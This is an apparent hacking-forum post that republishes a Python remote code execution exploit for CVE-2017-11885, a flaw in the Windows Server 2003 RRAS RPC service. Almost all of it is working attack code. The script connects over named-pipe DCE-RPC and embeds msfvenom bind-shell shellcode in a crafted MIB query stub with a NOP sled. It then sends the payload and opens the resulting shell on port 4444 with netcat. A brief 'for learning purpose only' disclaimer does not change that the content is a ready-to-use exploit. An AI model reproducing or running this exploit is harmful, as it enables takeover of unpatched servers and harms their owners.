搜索
查看: 662|回复: 0

CVE-2017-11885 EXP

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2018-5-15 19:06:29 | 显示全部楼层 |阅读模式
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. #Tested in Windows Server 2003 SP2 (ES) - Only works when RRAS service is enabled.

  4. #The exploited vulnerability is an arbitraty pointer deference affecting the dwVarID field of the MIB_OPAQUE_QUERY structure.
  5. #dwVarID (sent by the client) is used as a pointer to an array of functions. The application doest not check if the pointer is #pointing out of the bounds of the array so is possible to jump to specific portions of memory achieving remote code execution.
  6. #Microsoft has not released a patch for Windows Server 2003 so consider to disable the RRAS service if you are still using
  7. #Windows Server 2003.

  8. #Exploit created by: Víctor Portal
  9. #For learning purpose only

  10. import struct
  11. import sys
  12. import time
  13. import os

  14. from threading import Thread   
  15.                                 
  16. from impacket import smb
  17. from impacket import uuid
  18. from impacket import dcerpc
  19. from impacket.dcerpc.v5 import transport
  20.                  
  21. target = sys.argv[1]

  22. print '[-]Initiating connection'
  23. trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target)
  24. trans.connect()

  25. print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % target
  26. dce = trans.DCERPC_class(trans)

  27. #RRAS DCE-RPC endpoint
  28. dce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')))

  29. #msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00" -f python
  30. buf =  ""
  31. buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"
  32. buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"
  33. buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"
  34. buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"
  35. buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"
  36. buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"
  37. buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"
  38. buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"
  39. buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"
  40. buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"
  41. buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"
  42. buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"
  43. buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"
  44. buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"
  45. buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"
  46. buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"
  47. buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"
  48. buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"
  49. buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"
  50. buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"
  51. buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"
  52. buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"
  53. buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"
  54. buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"
  55. buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"
  56. buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"
  57. buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"
  58. buf += "\xc4\x25\x3d\xe9"

  59. #NDR format
  60. stub = "\x21\x00\x00\x00" #dwPid = PID_IP (IPv4)
  61. stub += "\x10\x27\x00\x00" #dwRoutingPID
  62. stub += "\xa4\x86\x01\x00" #dwMibInEntrySize
  63. stub += "\x41"*4 #_MIB_OPAQUE_QUERY pointer
  64. stub += "\x04\x00\x00\x00"  #dwVarID (_MIB_OPAQUE_QUERY)
  65. stub += "\x41"*4 #rgdwVarIndex (_MIB_OPAQUE_QUERY)
  66. stub += "\xa4\x86\x01\x00" #dwMibOutEntrySize
  67. stub += "\xad\x0b\x2d\x06" #dwVarID ECX (CALL off_64389048[ECX*4]) -> p2p JMP EAX #dwVarID (_MIB_OPAQUE_QUERY)
  68. stub +=  "\xd0\xba\x61\x41\x41" + "\x90"*5 + buf + "\x41"*(100000-10-len(buf)) #rgdwVarIndex (_MIB_OPAQUE_QUERY)
  69. stub += "\x04\x00\x00\x00" #dwId (_MIB_OPAQUE_INFO)
  70. stub += "\x41"*4 #ullAlign (_MIB_OPAQUE_INFO)


  71. dce.call(0x1e, stub)   #0x1d MIBEntryGetFirst (other RPC calls are also affected)
  72. print "[-]Exploit sent to target successfully..."

  73. print "Waiting for shell..."
  74. time.sleep(5)
  75. os.system("nc " + target + " 4444")
复制代码


过段时间可能会取消签到功能了
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表